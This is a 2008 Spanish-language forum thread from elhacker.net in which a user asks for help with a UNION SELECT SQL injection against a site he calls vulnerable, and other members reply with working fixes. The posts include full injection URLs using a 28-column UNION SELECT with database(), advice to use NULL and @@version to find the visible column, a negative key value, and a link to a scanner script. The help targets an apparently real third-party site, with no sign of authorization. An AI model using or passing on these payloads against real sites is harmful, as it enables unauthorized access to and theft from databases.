Problema con UNION SELECT en SQL Injection

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

Problema con UNION SELECT en SQL Injection

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Problema con UNION SELECT en SQL Injection (Leído 5,648 veces)

Mie2

Desconectado

Mensajes: 73

Se Hacker Es la MejoR DEfensas contra Los Atakes

Problema con UNION SELECT en SQL Injection

« en: 12 Octubre 2008, 23:55 pm »

bueno mi probemas es que tengo una web vuln me explico

es un ej
site.com/hack.php?key=14800 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

bueno se que la web tiene 28 columna pero cuado hago la inyeccion que seria esta

site.com/hack.php?key=14800 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

me dice los mismo no me da el nombre de la base de datos si no me explique aseto criticas gracias ayuda cual seria la inyeccion correcta o si nesecitan mas info graxx


« Última modificación: 22 Octubre 2008, 17:59 pm por sirdarckcat »	En línea

Mie2

berz3k

Colaborador

Desconectado

Mensajes: 1.212

Re: ayuda con sql iyeccion

« Respuesta #1 en: 13 Octubre 2008, 18:54 pm »

Seguramente no es el campo indicado, cambia los numeros por "NULL" y agrega version(). @@version o now(), solo para saber que campo es el valido. de ahi partes para injectar dependiendo de la base de datos.

-berz3k.


	En línea

Eazy

Desconectado

Mensajes: 229

Eazy [FM-Team]

Re: ayuda con sql iyeccion

« Respuesta #2 en: 18 Octubre 2008, 19:07 pm »

O podes usar el script de Login Root http://eazyrlz.blogspot.com/2008/10/sql-injection-scanner.html


	En línea

[/url]

ChElAnO

Desconectado

Mensajes: 129

Re: ayuda con sql iyeccion

« Respuesta #3 en: 20 Octubre 2008, 07:01 am »

hola, como dijo berz3k seguro estas usando una columna que no se muestra,
para saber que columnas son mostradas deberias probar

site.com/hack.php?key=-1 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

Asi, si en la pagina sale el numero 4 digamos, usa esa columna para poner database()
avisa si funciono,

saludos!


	En línea

1nc0d3

Desconectado

Mensajes: 8

El Hacking es un arte no es delincuencia!

Re: Problema con UNION SELECT en SQL Injection

« Respuesta #4 en: 29 Octubre 2008, 02:02 am »

Yo creo que has hecho mal en la injeccion :S

site.com/hack.php?key=-1+union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

Prueba asi y nos avisas si te resulta =]

Espero te haya servido!


« Última modificación: 29 Octubre 2008, 21:21 pm por 1nc0d3 »	En línea

1nc0d3! un hacker juega Callado!!!

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Ayuda con una union (sql injection) Nivel Web	4rkn63l	0	3,197	12 Febrero 2011, 02:21 am por 4rkn63l
	Union Based Sql Injection Nivel Web	Stuxnet	5	5,744	9 Febrero 2015, 13:08 pm por Shell Root
	Problema con <Select> Wordpress y Chrome Desarrollo Web	Maurice_Lupin	2	2,350	2 Febrero 2015, 21:58 pm por Maurice_Lupin
	Not Acceptable!, problema en ejercicios de injection SQL Hacking	Caroxh1	4	3,737	5 Febrero 2020, 17:32 pm por WHK
	Problema en ASP.NET Razor Pages Select asp-items .NET (C#, VB.NET, ASP)	Albpous	1	5,007	17 Febrero 2024, 16:02 pm por TickTack